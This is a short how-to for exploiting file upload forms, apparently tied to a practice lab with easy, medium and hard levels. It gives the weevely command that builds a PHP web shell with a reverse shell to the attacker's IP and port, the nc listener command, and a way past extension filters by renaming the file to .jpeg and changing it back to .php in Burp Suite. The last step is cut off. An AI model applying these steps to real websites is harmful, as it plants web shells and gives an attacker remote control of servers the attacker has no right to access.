Requirement :
if website allows to upload any type of file like profile picture or something it may be vulnerable
Setting up weevely :
in terminal :
weevely generate (password) (shell69.php) --revshell (your_IP) (your_port)Executing Exploit :
Upload the file (shell69.php) and try loading the file in your browser by sending it a request listen to the connection :
nc -lvnp <your_port>Levels of Protection :
Easy : There is no filter so the file gets uploaded
Medium : There is a filter to check the extension so first change the file extension to .jpeg and then use Burp Suite, intercept request and change it back to .php
Hard : The filter used to strong so try to use other weird extensions like here